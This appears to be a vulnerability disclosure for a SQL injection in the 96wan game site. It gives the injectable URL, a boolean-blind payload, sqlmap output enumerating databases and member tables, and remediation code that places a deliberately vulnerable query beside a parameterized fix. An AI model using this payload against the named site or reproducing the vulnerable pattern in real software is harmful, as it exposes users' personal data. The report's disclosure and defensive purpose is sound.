96wan game platform SQL injection vulnerability # involving 300,000 users (ID card number, name, email, etc.)
Injection address
# SQL injection URL: http://www.96wan.com/websiteapi/website_serverlist?gid=6 (the gid parameter is user-controllable and reaches the query unfiltered)
Six databases exposed (sqlmap output):

Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=6 AND 1429=1429
---
back-end DBMS: MySQL 5
available databases [6]:
[*] 96wan_ucenter
[*] 96wan_web        // main site database
[*] 96wan_wp
[*] information_schema
[*] mysql
[*] performance_schema
# Only the table list of the main site database was checked, without going any deeper (sensitive information of about 300,000 members is exposed):

Database: 96wan_web
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| 96wan_game_log          | 4680784 |
| 96wan_login_log         | 3916792 |
| 96wan_member_info       | 309322  |
| 96wan_register_log      | 308966  |
| 96wan_newcart           | 155681  |
| 96wan_newcard2          | 150832  |
| 96wan_channel_member    | 93985   |
| 96wan_pay_log           | 75946   |
| 96wan_pay_ok            | 44113   |
| 96wan_pay_togam         | 44113   |
| ku36_game_log           | 1, 31458 |
| 96wan_code_log          | 19938   |
| 96wan_lhzs_card         | 12349   |
| ku36_member_information | 4924    |
| 96wan_channel_info      | 3797    |
| 96wan_region            | 3144    |
| 96wan_verify_email      | 1901    |
| 96wan_game_server       | 622     |
| 96wan_forgetpwd         | 404     |
| 96wan_channel           | 380     |
| 96wan_city              | 340     |
| 96wan_article           | 311     |
| 96wan_access            | 197     |
| 96wan_friendlink        | 114     |
| 96wan_union_channel     | 102     |
| 96wan_password_appeal   | 97      |
| 96wan_lhzs_usecard      | 96      |
| 96wan_node              | 82      |
| 96wan_test_account      | 50      |
| 96wan_phone_code_log    | 46      |
| 96wan_union_members     | 40      |
| 96wan_province          | 34      |
| 96wan_channel_source    | 33      |
| 96wan_game              | 25      |
| 96wan_pay_type          | 20      |
| 96wan_slidepic          | 19      |
| 96wan_role_user         | 17      |
| 96wan_tg_pass           | 16      |
| 96wan_pay_test          | 12      |
| 96wan_notice            | 7       |
| 96wan_singlepage        | 7       |
| 96wan_group             | 6       |
| 96wan_channel_ts        | 5       |
| 96wan_role              | 5       |
| 96wan_user              | 4       |
| 96wan_category          | 3       |
| 96wan_dept              | 3       |
| 96wan_groups            | 3       |
| 96wan_union             | 2       |
| 96wan_card              | 1       |
| 96wan_code              | 1       |
| 96wan_phone_code        | 1       |
| 96wan_sygame            | 1       |
| 96wan_tg_paytype        | 1       |
+-------------------------+---------+
Solution:
Have the developers validate and filter the user-controllable gid parameter before it reaches the database query.
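The following is an added illustration of that fix, not code from 96wan or from the original report. The site's server-side code is not on the page, so the table layout (a single game_server table with a gid column, filled with constructed rows) and the function names are assumptions. It places the defective pattern (the query string built by concatenating the raw gid value, which is what lets a boolean condition such as the report's payload change the query's outcome) beside the hardened form: an allow-list integer check on gid followed by a parameterized query, so a non-numeric value is rejected before any SQL is executed.

```python
import re
import sqlite3


def make_db():
    """Build a small in-memory stand-in for the game_server table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE game_server (id INTEGER, gid INTEGER, server_name TEXT)")
    conn.executemany(
        "INSERT INTO game_server VALUES (?, ?, ?)",
        [(1, 6, "S1"), (2, 6, "S2"), (3, 7, "S3")],
    )
    conn.commit()
    return conn


def serverlist_vulnerable(conn, raw_gid):
    """Defective pattern: the raw ?gid= value is pasted into the SQL text.

    Anything after the number becomes part of the WHERE clause, so a
    condition appended by the client decides whether rows come back.
    """
    sql = "SELECT id, server_name FROM game_server WHERE gid = " + raw_gid
    return list(conn.execute(sql))


# Allow-list: a positive integer of at most ten digits, nothing else.
GID_RE = re.compile(r"^[1-9][0-9]{0,9}$")


def is_valid_gid(raw_gid):
    """True only if raw_gid is a plain positive integer string."""
    return isinstance(raw_gid, str) and GID_RE.match(raw_gid) is not None


def parse_gid(raw_gid):
    """Convert the request parameter to an int, rejecting anything that is not one."""
    if not is_valid_gid(raw_gid):
        raise ValueError("invalid gid parameter")
    return int(raw_gid)


def serverlist_hardened(conn, raw_gid):
    """Hardened form: validated integer bound through a query parameter.

    The driver sends the value separately from the statement text, so it
    can never change the structure of the query.
    """
    gid = parse_gid(raw_gid)
    return list(conn.execute(
        "SELECT id, server_name FROM game_server WHERE gid = ?", (gid,)
    ))


if __name__ == "__main__":
    db = make_db()
    print("normal request:", serverlist_hardened(db, "6"))
    for bad in ("6 AND 1429=1429", "6'", "", "-1"):
        print(repr(bad), "accepted" if is_valid_gid(bad) else "rejected")
```

The validation step is what turns a blind injection probe into a plain 400-style error at the edge of the application; the parameterized query is the defence that holds even if validation is bypassed elsewhere. Both belong in the fix, and the same two-step pattern applies to every other numeric parameter on the API.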